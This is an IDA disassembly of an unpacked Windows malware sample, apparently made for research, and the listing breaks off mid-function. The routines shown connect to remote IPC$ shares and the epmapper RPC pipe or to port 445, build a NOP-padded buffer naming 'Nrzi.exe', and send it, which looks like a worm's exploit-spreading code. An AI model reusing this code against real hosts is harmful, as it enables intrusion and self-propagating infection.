;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 24B6FB10DE35E3E48A776308103CDE29
; File Name : u:\work\24b6fb10de35e3e48a776308103cde29_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001A3B0 ( 107440.)
; Section size in file : 0001A3B0 ( 107440.)
; Offset to raw data for section: 00000600
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401000(LPCSTR lpMultiByteStr, int)
sub_401000 proc near ; CODE XREF: sub_4016C0+27�p
Dest = word ptr -358h
var_352 = byte ptr -352h
var_128 = byte ptr -128h
Source = word ptr -11Ch
var_4 = dword ptr -4
lpMultiByteStr = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 358h
push esi
push edi
mov esi, offset aIpc ; "\\IPC$"
lea edi, [ebp+var_128]
movsd
movsd
movsd
mov esi, offset asc_41E568 ; "\\\\"
lea edi, [ebp+Dest]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_352]
rep stosd
stosw
mov al, byte_4248A4
mov byte ptr [ebp+Source], al
push 45h
pop ecx
xor eax, eax
lea edi, [ebp+Source+1]
rep stosd
stosw
stosb
push 0FFh ; cchWideChar
lea eax, [ebp+Source]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
pop ecx
pop ecx
lea eax, [ebp+var_128]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
pop ecx
pop ecx
mov eax, [ebp+arg_4]
and dword ptr [eax+4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax+10h], 0
mov eax, [ebp+arg_4]
lea ecx, [ebp+Dest]
mov [eax+14h], ecx
mov eax, [ebp+arg_4]
and dword ptr [eax+1Ch], 0
push 0
push offset dword_4248A8
push offset dword_4248AC
push [ebp+arg_4]
call dword_4264C0
mov [ebp+var_4], eax
cmp [ebp+var_4], 5
jz short loc_4010E0
cmp [ebp+var_4], 4C3h
jnz short loc_4010F2
loc_4010E0: ; CODE XREF: sub_401000+D5�j
push 0
push 0
push 0
push [ebp+arg_4]
call dword_4264C0
mov [ebp+var_4], eax
loc_4010F2: ; CODE XREF: sub_401000+DE�j
cmp [ebp+var_4], 5
jz short loc_401101
cmp [ebp+var_4], 4C3h
jnz short loc_401105
loc_401101: ; CODE XREF: sub_401000+F6�j
xor eax, eax
jmp short loc_401108
; ---------------------------------------------------------------------------
loc_401105: ; CODE XREF: sub_401000+FF�j
push 1
pop eax
loc_401108: ; CODE XREF: sub_401000+103�j
pop edi
pop esi
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40110C(LPCSTR lpMultiByteStr)
sub_40110C proc near ; CODE XREF: sub_4016C0+83�p
; sub_4016C0+E3�p ...
Dest = word ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
Source = word ptr -118h
lpMultiByteStr = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push esi
push edi
mov esi, offset aIpc_0 ; "\\IPC$"
lea edi, [ebp+var_124]
movsd
movsd
movsd
mov esi, offset asc_41E57C ; "\\\\"
lea edi, [ebp+Dest]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_34E]
rep stosd
stosw
mov al, byte_4248B0
mov byte ptr [ebp+Source], al
push 45h
pop ecx
xor eax, eax
lea edi, [ebp+Source+1]
rep stosd
stosw
stosb
push 0FFh ; cchWideChar
lea eax, [ebp+Source]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
pop ecx
pop ecx
lea eax, [ebp+var_124]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
pop ecx
pop ecx
loc_4011A4: ; CODE XREF: sub_40110C+B8�j
push 0
push 0
lea eax, [ebp+Dest]
push eax
call dword_426388
test eax, eax
jz short loc_4011C6
push 7D0h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_4011A4
; ---------------------------------------------------------------------------
loc_4011C6: ; CODE XREF: sub_40110C+AB�j
push 1
pop eax
pop edi
pop esi
leave
retn
sub_40110C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011CD proc near ; CODE XREF: sub_4016C0+B9�p
; sub_4016C0+2DE�p
var_301C = dword ptr -301Ch
var_3018 = dword ptr -3018h
var_3014 = dword ptr -3014h
Dst = byte ptr -3010h
var_2FEC = byte ptr -2FECh
Size = dword ptr -2010h
Src = byte ptr -200Ch
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = byte ptr -1004h
var_CA4 = byte ptr -0CA4h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 301Ch
call __alloca_probe
and [ebp+var_4], 0
and [ebp+var_1008], 0
and [ebp+var_3018], 0
and [ebp+var_3014], 0
mov [ebp+Size], 0A7h
push offset String2 ; "Nrzi.exe"
push [ebp+arg_0]
call sub_40892F
pop ecx
push eax ; Str
push 1000h ; int
lea eax, [ebp+Src]
push eax ; Dst
call sub_40FFBD
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_401230
xor eax, eax
jmp locret_4016BE
; ---------------------------------------------------------------------------
loc_401230: ; CODE XREF: sub_4011CD+5A�j
push 30h ; Size
push offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+Dst]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_1008]
add eax, 30h
mov [ebp+var_1008], eax
push [ebp+Size] ; Size
push 0FFFFFF90h ; Val
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov eax, [ebp+var_1008]
add eax, [ebp+Size]
mov [ebp+var_1008], eax
push [ebp+var_4] ; Size
lea eax, [ebp+Src]
push eax ; Src
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+Dst]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_1008]
add eax, [ebp+var_4]
mov [ebp+var_1008], eax
mov eax, [ebp+var_1008]
mov [ebp+var_3018], eax
and [ebp+var_1008], 0
loc_4012CE: ; CODE XREF: sub_4011CD+1C1�j
mov eax, [ebp+var_3018]
cdq
push 10h
pop ecx
idiv ecx
cmp edx, 0Ch
jz loc_401393
mov eax, [ebp+Size]
inc eax
mov [ebp+Size], eax
push 30h ; Size
push offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+Dst]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_1008]
add eax, 30h
mov [ebp+var_1008], eax
push [ebp+Size] ; Size
push 0FFFFFF90h ; Val
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov eax, [ebp+var_1008]
add eax, [ebp+Size]
mov [ebp+var_1008], eax
push [ebp+var_4] ; Size
lea eax, [ebp+Src]
push eax ; Src
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+Dst]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_1008]
add eax, [ebp+var_4]
mov [ebp+var_1008], eax
mov eax, [ebp+var_1008]
mov [ebp+var_3018], eax
and [ebp+var_1008], 0
jmp loc_4012CE
; ---------------------------------------------------------------------------
loc_401393: ; CODE XREF: sub_4011CD+110�j
cmp [ebp+arg_C4], 0
jz short loc_4013DE
cmp [ebp+arg_C0], 3
jz short loc_4013AE
cmp [ebp+arg_C0], 0
jnz short loc_4013C6
loc_4013AE: ; CODE XREF: sub_4011CD+1D6�j
push 4 ; Size
push offset dword_41E558 ; Src
lea eax, [ebp+var_2FEC]
push eax ; Dst
call _memcpy
add esp, 0Ch
jmp short loc_4013DC
; ---------------------------------------------------------------------------
loc_4013C6: ; CODE XREF: sub_4011CD+1DF�j
push 4 ; Size
push offset dword_41E554 ; Src
lea eax, [ebp+var_2FEC]
push eax ; Dst
call _memcpy
add esp, 0Ch
loc_4013DC: ; CODE XREF: sub_4011CD+1F7�j
jmp short loc_401415
; ---------------------------------------------------------------------------
loc_4013DE: ; CODE XREF: sub_4011CD+1CD�j
cmp [ebp+arg_C0], 3
jnz short loc_4013FF
push 4 ; Size
push offset dword_41E558 ; Src
lea eax, [ebp+var_2FEC]
push eax ; Dst
call _memcpy
add esp, 0Ch
jmp short loc_401415
; ---------------------------------------------------------------------------
loc_4013FF: ; CODE XREF: sub_4011CD+218�j
push 4 ; Size
push offset dword_41E554 ; Src
lea eax, [ebp+var_2FEC]
push eax ; Dst
call _memcpy
add esp, 0Ch
loc_401415: ; CODE XREF: sub_4011CD:loc_4013DC�j
; sub_4011CD+230�j
push 360h ; Size
push offset dword_41E08C ; Src
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+var_1004]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_1008]
add eax, 360h
mov [ebp+var_1008], eax
push 10h ; Size
push offset dword_41E3F0 ; Src
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+var_1004]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_1008]
add eax, 10h
mov [ebp+var_1008], eax
push [ebp+var_3018] ; Size
lea eax, [ebp+Dst]
push eax ; Src
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+var_1004]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_1008]
add eax, [ebp+var_3018]
mov [ebp+var_1008], eax
push 3Ch ; Size
push offset off_41E404 ; Src
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+var_1004]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_1008]
add eax, 3Ch
mov [ebp+var_1008], eax
push 30h ; Size
push offset dword_41E444 ; Src
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+var_1004]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_1008]
add eax, 30h
mov [ebp+var_1008], eax
mov eax, [ebp+var_1008]
mov [ebp+var_3014], eax
lea eax, [ebp+var_CA4]
mov [ebp+var_301C], eax
mov eax, [ebp+var_3018]
cdq
sub eax, edx
sar eax, 1
mov ecx, [ebp+var_301C]
mov ecx, [ecx]
add ecx, eax
mov eax, [ebp+var_301C]
mov [eax], ecx
mov eax, [ebp+var_3018]
cdq
sub eax, edx
sar eax, 1
mov ecx, [ebp+var_301C]
mov ecx, [ecx+8]
add ecx, eax
mov eax, [ebp+var_301C]
mov [eax+8], ecx
lea eax, [ebp+var_1004]
mov [ebp+var_301C], eax
mov eax, [ebp+var_301C]
mov eax, [eax+8]
mov ecx, [ebp+var_3018]
lea eax, [eax+ecx-0Ch]
mov ecx, [ebp+var_301C]
mov [ecx+8], eax
mov eax, [ebp+var_301C]
mov eax, [eax+10h]
mov ecx, [ebp+var_3018]
lea eax, [eax+ecx-0Ch]
mov ecx, [ebp+var_301C]
mov [ecx+10h], eax
mov eax, [ebp+var_301C]
mov eax, [eax+80h]
mov ecx, [ebp+var_3018]
lea eax, [eax+ecx-0Ch]
mov ecx, [ebp+var_301C]
mov [ecx+80h], eax
mov eax, [ebp+var_301C]
mov eax, [eax+84h]
mov ecx, [ebp+var_3018]
lea eax, [eax+ecx-0Ch]
mov ecx, [ebp+var_301C]
mov [ecx+84h], eax
mov eax, [ebp+var_301C]
mov eax, [eax+0B4h]
mov ecx, [ebp+var_3018]
lea eax, [eax+ecx-0Ch]
mov ecx, [ebp+var_301C]
mov [ecx+0B4h], eax
mov eax, [ebp+var_301C]
mov eax, [eax+0B8h]
mov ecx, [ebp+var_3018]
lea eax, [eax+ecx-0Ch]
mov ecx, [ebp+var_301C]
mov [ecx+0B8h], eax
mov eax, [ebp+var_301C]
mov eax, [eax+0D0h]
mov ecx, [ebp+var_3018]
lea eax, [eax+ecx-0Ch]
mov ecx, [ebp+var_301C]
mov [ecx+0D0h], eax
mov eax, [ebp+var_301C]
mov eax, [eax+18Ch]
mov ecx, [ebp+var_3018]
lea eax, [eax+ecx-0Ch]
mov ecx, [ebp+var_301C]
mov [ecx+18Ch], eax
mov eax, [ebp+var_3014]
inc eax
push eax ; Size
call _malloc
pop ecx
mov [ebp+var_100C], eax
mov eax, [ebp+var_3014]
inc eax
push eax ; Size
push 0 ; Val
push [ebp+var_100C] ; Dst
call _memset
add esp, 0Ch
push [ebp+var_3014] ; Size
lea eax, [ebp+var_1004]
push eax ; Src
push [ebp+var_100C] ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+arg_BC]
mov ecx, [ebp+var_3014]
mov [eax], ecx
mov eax, [ebp+var_100C]
locret_4016BE: ; CODE XREF: sub_4011CD+5E�j
leave
retn
sub_4011CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4016C0(char, const CHAR MultiByteStr, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int)
sub_4016C0 proc near ; CODE XREF: sub_405759+29F�p
; DATA XREF: .data:off_41ED9C�o
Dst = word ptr -1168h
var_1166 = word ptr -1166h
var_1164 = dword ptr -1164h
var_1158 = byte ptr -1158h
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
Memory = dword ptr -144h
hObject = dword ptr -140h
lpBuffer = dword ptr -13Ch
NumberOfBytesWritten= dword ptr -138h
var_134 = dword ptr -134h
Dest = byte ptr -130h
var_2C = dword ptr -2Ch
nNumberOfBytesToWrite= dword ptr -28h
NumberOfBytesRead= dword ptr -24h
var_20 = dword ptr -20h
arg_0 = byte ptr 8
MultiByteStr = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
push ebp
mov ebp, esp
mov eax, 1168h
call __alloca_probe
push esi
push edi
cmp [ebp+arg_A0], 1BDh
jnz loc_4018FB
lea eax, [ebp+var_20]
push eax ; int
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
call sub_401000
pop ecx
pop ecx
test eax, eax
jnz short loc_4016F9
xor eax, eax
jmp loc_401AFD
; ---------------------------------------------------------------------------
loc_4016F9: ; CODE XREF: sub_4016C0+30�j
lea eax, [ebp+MultiByteStr]
push eax
push offset aSPipeEpmapper ; "\\\\%s\\pipe\\epmapper"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
lea eax, [ebp+Dest]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jnz short loc_401750
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
call sub_40110C
pop ecx
xor eax, eax
jmp loc_401AFD
; ---------------------------------------------------------------------------
loc_401750: ; CODE XREF: sub_4016C0+7D�j
push 2
lea eax, [ebp+MultiByteStr]
push eax
call sub_409D82
pop ecx
pop ecx
mov [ebp+var_2C], eax
push 1
push [ebp+var_2C]
lea eax, [ebp+nNumberOfBytesToWrite]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+arg_0]
mov edi, esp
rep movsd
call sub_4011CD
add esp, 0C8h
mov [ebp+lpBuffer], eax
cmp [ebp+lpBuffer], 0
jnz short loc_4017B0
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
call sub_40110C
pop ecx
xor eax, eax
jmp loc_401AFD
; ---------------------------------------------------------------------------
loc_4017B0: ; CODE XREF: sub_4016C0+D1�j
push 186A0h ; Size
call _malloc
pop ecx
mov [ebp+Memory], eax
push 186A0h ; Size
push 0 ; Val
push [ebp+Memory] ; Dst
call _memset
add esp, 0Ch
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpBytesRead
push 2710h ; nOutBufferSize
push [ebp+Memory] ; lpOutBuffer
push 48h ; nInBufferSize
push offset dword_41E040 ; lpInBuffer
push [ebp+hObject] ; hNamedPipe
call ds:TransactNamedPipe ; TransactNamedPipe
mov eax, [ebp+Memory]
movsx eax, byte ptr [eax+2]
cmp eax, 0Ch
jz short loc_40183E
push [ebp+Memory] ; Memory
call _free
pop ecx
push [ebp+lpBuffer] ; Memory
call _free
pop ecx
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
call sub_40110C
pop ecx
xor eax, eax
jmp loc_401AFD
; ---------------------------------------------------------------------------
loc_40183E: ; CODE XREF: sub_4016C0+147�j
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push [ebp+hObject] ; hFile
call ds:WriteFile ; WriteFile
test eax, eax
jnz short loc_401895
push [ebp+Memory] ; Memory
call _free
pop ecx
push [ebp+lpBuffer] ; Memory
call _free
pop ecx
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
call sub_40110C
pop ecx
xor eax, eax
jmp loc_401AFD
; ---------------------------------------------------------------------------
loc_401895: ; CODE XREF: sub_4016C0+19E�j
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push 2710h ; nNumberOfBytesToRead
push [ebp+Memory] ; lpBuffer
push [ebp+hObject] ; hFile
call ds:ReadFile ; ReadFile
mov [ebp+var_134], eax
push [ebp+lpBuffer] ; Memory
call _free
pop ecx
push [ebp+Memory] ; Memory
call _free
pop ecx
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
call sub_40110C
pop ecx
cmp [ebp+var_134], 1
jnz short loc_4018F6
xor eax, eax
jmp loc_401AFD
; ---------------------------------------------------------------------------
loc_4018F6: ; CODE XREF: sub_4016C0+22D�j
jmp loc_401AEF
; ---------------------------------------------------------------------------
loc_4018FB: ; CODE XREF: sub_4016C0+19�j
push 1
lea eax, [ebp+MultiByteStr]
push eax
call sub_409D82
pop ecx
pop ecx
mov [ebp+var_150], eax
cmp [ebp+var_150], 1
jnz short loc_40191E
xor eax, eax
jmp loc_401AFD
; ---------------------------------------------------------------------------
loc_40191E: ; CODE XREF: sub_4016C0+255�j
push 0
push 1
push 2
call dword_4264A0 ; socket
mov [ebp+var_148], eax
cmp [ebp+var_148], 0FFFFFFFFh
jnz short loc_401940
xor eax, eax
jmp loc_401AFD
; ---------------------------------------------------------------------------
loc_401940: ; CODE XREF: sub_4016C0+277�j
push 10h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_A0]
call dword_426424 ; ntohs
mov [ebp+var_1166], ax
lea eax, [ebp+MultiByteStr]
push eax
call dword_426460 ; inet_addr
mov [ebp+var_1164], eax
push 0
push [ebp+var_150]
lea eax, [ebp+var_14C]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+arg_0]
mov edi, esp
rep movsd
call sub_4011CD
add esp, 0C8h
mov [ebp+var_158], eax
cmp [ebp+var_158], 0
jnz short loc_4019CB
push [ebp+var_148]
call dword_4264B8 ; closesocket
xor eax, eax
jmp loc_401AFD
; ---------------------------------------------------------------------------
loc_4019CB: ; CODE XREF: sub_4016C0+2F6�j
push 10h
lea eax, [ebp+Dst]
push eax
push [ebp+var_148]
call dword_4263D8 ; connect
mov [ebp+var_154], eax
cmp [ebp+var_154], 0FFFFFFFFh
jnz short loc_401A0E
push [ebp+var_158] ; Memory
call _free
pop ecx
push [ebp+var_148]
call dword_4264B8 ; closesocket
xor eax, eax
jmp loc_401AFD
; ---------------------------------------------------------------------------
loc_401A0E: ; CODE XREF: sub_4016C0+32D�j
push 0
push 48h
push offset dword_41E040
push [ebp+var_148]
call dword_426470 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401A47
push [ebp+var_158] ; Memory
call _free
pop ecx
push [ebp+var_148]
call dword_4264B8 ; closesocket
xor eax, eax
jmp loc_401AFD
; ---------------------------------------------------------------------------
loc_401A47: ; CODE XREF: sub_4016C0+366�j
push 0
push 1000h
lea eax, [ebp+var_1158]
push eax
push [ebp+var_148]
call dword_42643C ; recv
push 0
push [ebp+var_14C]
push [ebp+var_158]
push [ebp+var_148]
call dword_426470 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401A9C
push [ebp+var_158] ; Memory
call _free
pop ecx
push [ebp+var_148]
call dword_4264B8 ; closesocket
xor eax, eax
jmp short loc_401AFD
; ---------------------------------------------------------------------------
loc_401A9C: ; CODE XREF: sub_4016C0+3BE�j
push 0
push 1000h
lea eax, [ebp+var_1158]
push eax
push [ebp+var_148]
call dword_42643C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_401AD7
push [ebp+var_158] ; Memory
call _free
pop ecx
push [ebp+var_148]
call dword_4264B8 ; closesocket
xor eax, eax
jmp short loc_401AFD
; ---------------------------------------------------------------------------
loc_401AD7: ; CODE XREF: sub_4016C0+3F9�j
push [ebp+var_158] ; Memory
call _free
pop ecx
push [ebp+var_148]
call dword_4264B8 ; closesocket
loc_401AEF: ; CODE XREF: sub_4016C0:loc_4018F6�j
push 3E8h ; dwMilliseconds
call ds:Sleep ; Sleep
push 1
pop eax
loc_401AFD: ; CODE XREF: sub_4016C0+34�j
; sub_4016C0+8B�j ...
pop edi
pop esi
leave
retn
sub_4016C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B01 proc near ; CODE XREF: sub_401EC3+F�p
; sub_401EC3+49�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
and dword ptr [eax], 0
mov eax, [ebp+var_4]
leave
retn
sub_401B01 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
push dword ptr [ebp+8]
call _strlen
pop ecx
push eax
push dword ptr [ebp+8]
lea ecx, [ebp-8]
call sub_401B4C
mov ecx, [eax]
mov eax, [eax+4]
mov edx, [ebp-0Ch]
mov [edx], ecx
mov [edx+4], eax
mov eax, [ebp-0Ch]
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_401B4C(void *Src, size_t Size)
sub_401B4C proc near ; CODE XREF: .text:00401B33�p
; sub_401EC3+145�p
var_8 = dword ptr -8
Dst = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
push [ebp+Size] ; Size
call _malloc
pop ecx
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jnz short loc_401B68
jmp short loc_401B9A
; ---------------------------------------------------------------------------
loc_401B68: ; CODE XREF: sub_401B4C+18�j
push [ebp+Size] ; Size
push 0 ; Val
push [ebp+Dst] ; Dst
call _memset
add esp, 0Ch
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push [ebp+Dst] ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_8]
mov ecx, [ebp+Size]
mov [eax+4], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+Dst]
mov [eax], ecx
loc_401B9A: ; CODE XREF: sub_401B4C+1A�j
mov eax, [ebp+var_8]
leave
retn 8
sub_401B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_401BA1(void *Src, size_t Size, int, int)
sub_401BA1 proc near ; CODE XREF: sub_401D3C+1E�p
; sub_401DD0+1D�p ...
var_8 = dword ptr -8
Dst = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+Size]
add eax, [ebp+arg_C]
push eax ; Size
call _malloc
pop ecx
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jnz short loc_401BC1
jmp short loc_401C0F
; ---------------------------------------------------------------------------
loc_401BC1: ; CODE XREF: sub_401BA1+1C�j
mov eax, [ebp+Size]
add eax, [ebp+arg_C]
push eax ; Size
push 0 ; Val
push [ebp+Dst] ; Dst
call _memset
add esp, 0Ch
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push [ebp+Dst] ; Dst
call _memcpy
add esp, 0Ch
push [ebp+arg_C] ; Size
push [ebp+arg_8] ; Src
mov eax, [ebp+Dst]
add eax, [ebp+Size]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+Size]
add eax, [ebp+arg_C]
mov ecx, [ebp+var_8]
mov [ecx+4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+Dst]
mov [eax], ecx
loc_401C0F: ; CODE XREF: sub_401BA1+1E�j
mov eax, [ebp+var_8]
leave
retn 10h
sub_401BA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C16 proc near ; CODE XREF: sub_401D3C+71�p
; sub_401D3C+8B�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_401C30
mov eax, [ebp+var_4]
push dword ptr [eax] ; Memory
call _free
pop ecx
loc_401C30: ; CODE XREF: sub_401C16+D�j
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
and dword ptr [eax], 0
leave
retn
sub_401C16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C3F proc near ; CODE XREF: sub_401D3C+26�p
; sub_401E47+C�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
Dst = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
cmp dword ptr [eax+4], 0FFFFh
jl short loc_401C5B
xor al, al
jmp locret_401D3A
; ---------------------------------------------------------------------------
loc_401C5B: ; CODE XREF: sub_401C3F+13�j
mov eax, [ebp+var_C]
cmp dword ptr [eax+4], 7Fh
jge short loc_401C6D
mov [ebp+var_8], 1
jmp short loc_401C74
; ---------------------------------------------------------------------------
loc_401C6D: ; CODE XREF: sub_401C3F+23�j
mov [ebp+var_8], 3
loc_401C74: ; CODE XREF: sub_401C3F+2C�j
mov eax, [ebp+var_C]
mov eax, [eax+4]
add eax, [ebp+var_8]
push eax ; Size
call _malloc
pop ecx
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jnz short loc_401C94
xor al, al
jmp locret_401D3A
; ---------------------------------------------------------------------------
loc_401C94: ; CODE XREF: sub_401C3F+4C�j
mov eax, [ebp+var_C]
mov eax, [eax+4]
add eax, [ebp+var_8]
push eax ; Size
push 0 ; Val
push [ebp+Dst] ; Dst
call _memset
add esp, 0Ch
cmp [ebp+var_8], 1
jnz short loc_401CD6
mov eax, [ebp+Dst]
mov ecx, [ebp+var_C]
mov cl, [ecx+4]
mov [eax], cl
mov eax, [ebp+var_C]
push dword ptr [eax+4] ; Size
mov eax, [ebp+var_C]
push dword ptr [eax] ; Src
mov eax, [ebp+Dst]
inc eax
push eax ; Dst
call _memcpy
add esp, 0Ch
jmp short loc_401D16
; ---------------------------------------------------------------------------
loc_401CD6: ; CODE XREF: sub_401C3F+70�j
mov eax, [ebp+Dst]
mov byte ptr [eax], 82h
mov eax, [ebp+var_C]
mov eax, [eax+4]
sar eax, 8
mov ecx, [ebp+Dst]
mov [ecx+1], al
mov eax, [ebp+var_C]
mov eax, [eax+4]
and eax, 0FFh
